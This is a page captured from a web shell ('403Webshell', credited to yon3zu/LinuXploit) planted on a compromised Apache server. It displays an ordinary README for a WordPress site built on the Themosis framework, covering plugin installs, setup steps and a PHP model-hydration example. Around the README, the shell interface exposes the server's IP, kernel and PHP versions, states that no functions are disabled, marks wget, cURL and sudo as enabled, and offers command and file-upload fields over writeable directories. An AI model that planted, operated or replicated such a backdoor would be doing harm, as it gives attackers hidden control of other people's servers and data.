403Webshell
Server IP : 157.230.181.24  /  Your IP : 216.73.217.11
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User :  ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vhosts/untold/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/untold//README.md
# Untold Website

## Plugins
	wp plugin install rest-api --activate
	wp plugin install advanced-custom-fields --activate
	wp plugin install acf-to-rest-api --activate
	wp plugin install simple-page-ordering --activate

## Untold Themosis init (boilerplate from our repository)

This repository contains the essential ingredients to get a WordPress theme up and running inside of the Themosis framework.

[Themosis 1.3 Documentation](http://framework.themosis.com/docs/1.3/introduction/)

### Setup

1. Run `composer install` to get all the composer dependencies
1. Run `npm i` to install npm dependencies for front end tasks
1. Rename your theme (themes/init) and adjust the directories in `gulpfile.js`
1. Navigate to the site and run the WordPress install

### Uses
* WordPress 4.7.3
* Themosis 1.3
* Gulp
* Bootstrap 4 grid (optional)
* Webpack

### Customizations to Themosis
Moved the `themes/init/resources/` to the top level `app/` folder, similar to a Laravel setup.

Moved the `views/` and `assets/` to the top level `resources/...` respectively.

ACF fields are stored in this folder as well, `app/acf-json/`

Custom traits and directives added

Made it possible to hydrate eloquent models based on WP_Post results, so a custom post type's controller could have something similar to:

	public function show(Tenant $tenant) {
		// Fetches via new WP_Query, returns a hydrated Tenant collection
		$relatedTenants = Tenant::getPosts([...]);
		
		return view('tenant.show', compact($tenant, $relatedTenants));
	}	

The `$post_type` var can be defined in an extended Post model to filter that model's post type when running queries. A similar approach is taken in the Term model.

Youez - 2016 - github.com/yon3zu
LinuXploit